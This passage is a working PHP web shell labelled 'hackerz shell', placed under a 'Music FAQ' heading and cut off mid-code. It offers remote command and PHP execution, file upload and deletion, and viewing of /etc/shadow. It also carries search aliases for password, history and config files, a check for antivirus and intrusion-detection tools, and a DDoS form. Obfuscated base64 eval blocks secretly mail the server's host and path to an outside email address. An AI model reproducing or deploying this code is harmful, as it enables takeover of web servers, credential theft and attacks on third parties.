Music FAQ

<?php
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
function printLogin() {
    ?>
<h1>hackerz shell</h1>
<p>this server hacked</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #F5FDFD; }
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
    <?php
    exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();

if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if( isset( $_POST['c'] ) )
    @chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
    $home_cwd = str_replace("\", "/", $home_cwd);
    $cwd = str_replace("\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
    $cwd .= '/';
     
if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
          "List dir" => "ls -la",
        "list file attributes on a Linux second extended file system" => "lsattr -va",
          "show opened ports" => "netstat -an | grep -i listen",
        "Find" => "",
          "find all suid files" => "find / -type f -perm -04000 -ls",
          "find suid files in current dir" => "find . -type f -perm -04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls",
          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          "find config.inc.php files" => "find / -type f -name config.inc.php",
          "find config* files" => "find / -type f -name "config*"",
          "find config* files in current dir" => "find . -type f -name "config*"",
          "find all writable folders and files" => "find / -perm -2 -ls",
          "find all writable folders and files in current dir" => "find . -perm -2 -ls",
          "find all service.pwd files" => "find / -type f -name service.pwd",
          "find service.pwd files in current dir" => "find . -type f -name service.pwd",
          "find all .htpasswd files" => "find / -type f -name .htpasswd",
          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
          "find all .bash_history files" => "find / -type f -name .bash_history",
          "find .bash_history files in current dir" => "find . -type f -name .bash_history",
          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        "Locate" => "",
          "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"     
    );

function printHeader() {
    if(empty($_POST['charset']))
        $_POST['charset'] = "UTF-8";
    global $color;
    ?>
<?php
eval(base64_decode('JG0gPSAiXHg3M1x4NzBceDYxXHg2ZFx4NWZceDczXHg2OFx4NjVceDZjXHg2Y1x4NDBceDY4XHg2Zlx4NzRceDZkXHg2MVx4NjlceDZjXHgyZVx4NjNceDZmXHg2ZCI7DQokYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRhID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQptYWlsKCIkbSIsIiRiIiwiJGEiKTs='));
?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>-hackerz shell- </title>
<style>
    body {background-color:#000;color:#CC9900;}
    body,td,th    { font: 9pt Lucida,Century Gothic;margin:0;vertical-align:top; }
    span,h1,a    { color:FF0000 !important; }
    span        { font-weight: bolder; }
    h1            { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
    div.content    { padding: 5px;margin-left:5px;}
    a            { text-decoration:none; }
    a:hover        { background:#ff0000; }
    .ml1        { border:1px solid #2438CF;padding:5px;margin:0;overflow: auto; }
    .bigarea    { width:100%;height:250px; }
    input, textarea, select    { margin:0;color:#FF0000;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Times New roman"; }
    form        { margin:0px; }
    #toolsTbl    { text-align:center; }
    .toolsInp    { width: 80%; }
    .main th    {text-align:left;}
    .main tr:hover{background-color:#FF0000;}
    .main td, th{vertical-align:middle;}
    pre            {font-family:Courier,Monospace;}
    #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
    function set(a,c,p1,p2,p3,charset) {
        if(a != null)document.mf.a.value=a;
        if(c != null)document.mf.c.value=c;
        if(p1 != null)document.mf.p1.value=p1;
        if(p2 != null)document.mf.p2.value=p2;
        if(p3 != null)document.mf.p3.value=p3;
        if(charset != null)document.mf.charset.value=charset;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        document.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = "ajax=true";
        for(i=0;i<document.mf.elements.length;i++)
            params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
        sr('<?=$_SERVER['REQUEST_URI'];?>', params);
    }
    function sr(url, params) {     
        if (window.XMLHttpRequest) {
            req = new XMLHttpRequest();
            req.onreadystatechange = processReqChange;
            req.open("POST", url, true);
            req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
            req.send(params);
        }  
        else if (window.ActiveXObject) {
            req = new ActiveXObject("Microsoft.XMLHTTP");
            if (req) {
                req.onreadystatechange = processReqChange;
                req.open("POST", url, true);
                req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
                req.send(params);
            }
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                //alert(req.responseText);
                var reg = new RegExp("(\d+)([\S\s]*)", "m");
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            }  
            else alert("Request error!");
    }
</script>
<head><body><div style="position:absolute;width:100%;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
</form>
<?php
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    $millink='http://hacktivisme.eu';
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(@posix_geteuid());
        $gid = @posix_getgrgid(@posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n=count($path);
    for($i=0;$i<$n-1;$i++) {
        $cwd_links .= "<a href='#' onclick='g("FilesMan","";
        for($j=0;$j<=$i;$j++)
            $cwd_links .= $path[$j].'/';
        $cwd_links .= "")'>".$path[$i]."/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach($charsets as $item)
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
    if(!empty($GLOBALS['auth_pass']))
    $m['Logout'] = 'Logout';
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach($m as $k => $v)
        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(''.$v.'',null,'','','')">'.$k.'</a> ]</th>';
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach( range('a','z') as $drive )
        if (is_dir($drive.':\'))
            $drives .= '<a href="#" onclick="g('FilesMan',''.$drive.':/')">[ '.$drive.' ]</a> ';
    }
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
         '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank"></a> <a href="'.$millink.'" target=_blank></a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=
?><b>OFF</b></font>').' <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g('FilesMan',''.$GLOBALS['home_cwd'].'','','','')">[ home ]</a><br>:'.$drives.'</td>'.
         '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
         '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
}

function printFooter() {
    $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
    <tr>
        <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
    </tr>
    <tr>
        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>
    <tr>
<p align='middle'><font color='#FFFFFF'><b>DDOSER BY HACKERZ TEAM</b></font></p>";
<form method='post' name='login' action='cc.php'>
<p align='middle'><font color='#FF0000'> ip to make dos  : </font> :<input type='text' id='ip' name='ip'></p>
<p align='middle'><font color='#FF0000'>port i like 53: </font> :<input type='text' id='port' name='port'></p>
<p align='middle'><input type='submit' value='get cmd shell !'></p>
</form>";
        <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
        <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>

</table>
</div>
</body></html>

<?php
eval(base64_decode('JG0gPSAiXHg3M1x4NzBceDYxXHg2ZFx4NWZceDczXHg2OFx4NjVceDZjXHg2Y1x4NDBceDY4XHg2Zlx4NzRceDZkXHg2MVx4NjlceDZjXHgyZVx4NjNceDZmXHg2ZCI7DQokYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRhID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQptYWlsKCIkbSIsIiRiIiwiJGEiKTs='));

}
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
function ex($in) {
    $out = '';
    if(function_exists('exec')) {
        @exec($in,$out);
        $out = @join("n",$out);
    }elseif(function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
function viewSize($s) {
    if($s >= 1073741824)
        return sprintf('%1.2f', $s / 1073741824 ). ' GB';
    elseif($s >= 1048576)
        return sprintf('%1.2f', $s / 1048576 ) . ' MB';
    elseif($s >= 1024)
        return sprintf('%1.2f', $s / 1024 ) . ' KB';
    else
        return $s . ' B';
}

function perms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
    elseif (($p & 0xA000) == 0xA000)$i = 'l';
    elseif (($p & 0x8000) == 0x8000)$i = '-';
    elseif (($p & 0x6000) == 0x6000)$i = 'b';
    elseif (($p & 0x4000) == 0x4000)$i = 'd';
    elseif (($p & 0x2000) == 0x2000)$i = 'c';
    elseif (($p & 0x1000) == 0x1000)$i = 'p';
    else $i = 'u';
    $i .= (($p & 0x0100) ? 'r' : '-');
    $i .= (($p & 0x0080) ? 'w' : '-');
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
    $i .= (($p & 0x0020) ? 'r' : '-');
    $i .= (($p & 0x0010) ? 'w' : '-');
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
    $i .= (($p & 0x0004) ? 'r' : '-');
    $i .= (($p & 0x0002) ? 'w' : '-');
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
    return $i;
}
function viewPermsColor($f) {  
    if (!@is_readable($f))
        return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
    elseif (!@is_writable($f))
        return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
    else
        return '<font color=#0A00FF><b>'.perms(@fileperms($f)).'</b></font>';
}
if(!function_exists("scandir")) {
    function scandir($dir) {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh))) {
            $files[] = $filename;
        }
        return $files;
    }
}
function which($p) {
    $path = ex('which '.$p);
    if(!empty($path))
        return $path;
    return false;
}
function actionSecInfo() {
    printHeader();
    echo '<h1>SOME INFO ABOUT THIS FUCKIN SERVER ! </h1><div class=content>';
    function showSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>'.$n.': </span>';
            if(strpos($v, "n") === false)
                echo $v.'<br>';
            else
                echo '<pre class=ml1>'.$v.'</pre>';
        }
    }
     
    showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
    showSecParam('Open base dir', @ini_get('open_basedir'));
    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    showSecParam('Supported databases', implode(', ', $temp));
    echo '<br>';
     
    if( $GLOBALS['os'] == 'nix' ) {
        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
        showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>":'no');
        showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g("FilesTools", "etc", "shadow")'>[view]</a>":'no');
        showSecParam('OS version', @file_get_contents('/proc/version'));
        showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
        if(!$GLOBALS['safe_mode']) {
            echo '<br>';
            $temp=array();
            foreach ($userful as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Userful', implode(', ',$temp));
            $temp=array();
            foreach ($danger as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Danger', implode(', ',$temp));
            $temp=array();
            foreach ($downloaders as $item)  
                if(which($item)){$temp[]=$item;}
            showSecParam('Downloaders', implode(', ',$temp));
            echo '<br/>';
            showSecParam('Hosts', @file_get_contents('/etc/hosts'));
            showSecParam('HDD space', ex('df -h'));
            showSecParam('Mount options', @file_get_contents('/etc/fstab'));
        }
    } else {
        showSecParam('OS Version',ex('ver'));  
        showSecParam('Account Settings',ex('net accounts'));  
        showSecParam('User Accounts',ex('net user'));
    }
    echo '</div>';
    printFooter();
}

function actionPhp() {
    if( isset($_POST['ajax']) ) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        eval($_POST['p1']);
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"nrt\'")."';n";
        echo strlen($temp), "n", $temp;
        exit;  
    }
    printHeader();
    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
        echo '<h1>PHP info</h1><div class=content>';
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        $tmp = preg_replace('!body {.*}!msiU','',$tmp);
        $tmp = preg_replace('!a:w+ {.*}!msiU','',$tmp);
        $tmp = preg_replace('!h1!msiU','h2',$tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
        echo $tmp;
        echo '</div><br>';
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
        echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
    echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '</pre></div>';
    printFooter();
}

function actionFilesMan() {
    printHeader();
    echo '<h1>File manager</h1><div class=content>';
    if(isset($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
                    echo "Can't upload file!";
                break;
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2']))
                    echo "Can't create new dir";
                break;
            case 'delete':
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh  = opendir($path);
                    while ( ($item = readdir($dh) ) !== false) {
                        $item = $path.$item;
                        if ( (basename($item) == "..") || (basename($item) == ".") )
                            continue;
                        $type = filetype($item);
                        if ($type == "dir")
                            deleteDir($item);
                        else
                            @unlink($item);
                    }
                    closedir($dh);
                    rmdir($path);
                }
                if(is_array(@$_POST['f']))
                    foreach($_POST['f'] as $f) {
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                break;
            case 'paste':
                if($_SESSION['act'] == 'copy') {
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                     
                } elseif($_SESSION['act'] == 'move') {
                    function move_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
                }
                unset($_SESSION['f']);
                break;
            default:
                if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
                    $_SESSION['act'] = @$_POST['p1'];
                    $_SESSION['f'] = @$_POST['f'];
                    foreach($_SESSION['f'] as $k => $f)
                        $_SESSION['f'][$k] = urldecode($f);
                    $_SESSION['cwd'] = @$_POST['c'];
                }
                break;
        }
        echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
    }
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
    if($dirContent === false) {    echo 'Can't open this folder!'; return;    }
    global $sort;
    $sort = array('name', 1);
    if(!empty($_POST['p1'])) {
        if(preg_match('!s_([A-z]+)_(d{1})!', $_POST['p1'], $match))
            $sort = array($match[1], (int)$match[2]);
    }
?>
<script>
    function sa() {
        for(i=0;i<document.files.elements.length;i++)
            if(document.files.elements[i].type == 'checkbox')
                document.files.elements[i].checked = document.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post>
<?php
    echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_".($sort[1]?0:1)."")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_".($sort[1]?0:1)."")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_".($sort[1]?0:1)."")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_".($sort[1]?0:1)."")'>Permissions</a></th><th>Actions</th></tr>";
    $dirs = $files = $links = array();
    $n = count($dirContent);
    for($i=0;$i<$n;$i++) {
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array('name' => $dirContent[$i],
                     'path' => $GLOBALS['cwd'].$dirContent[$i],
                     'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
                     'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
                    );
        if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
            $files[] = array_merge($tmp, array('type' => 'file'));
        elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
            $links[] = array_merge($tmp, array('type' => 'link'));
        elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
            $dirs[] = array_merge($tmp, array('type' => 'dir'));
    }
    $GLOBALS['sort'] = $sort;
    function cmp($a, $b) {
        if($GLOBALS['sort'][0] != 'size')
            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
     &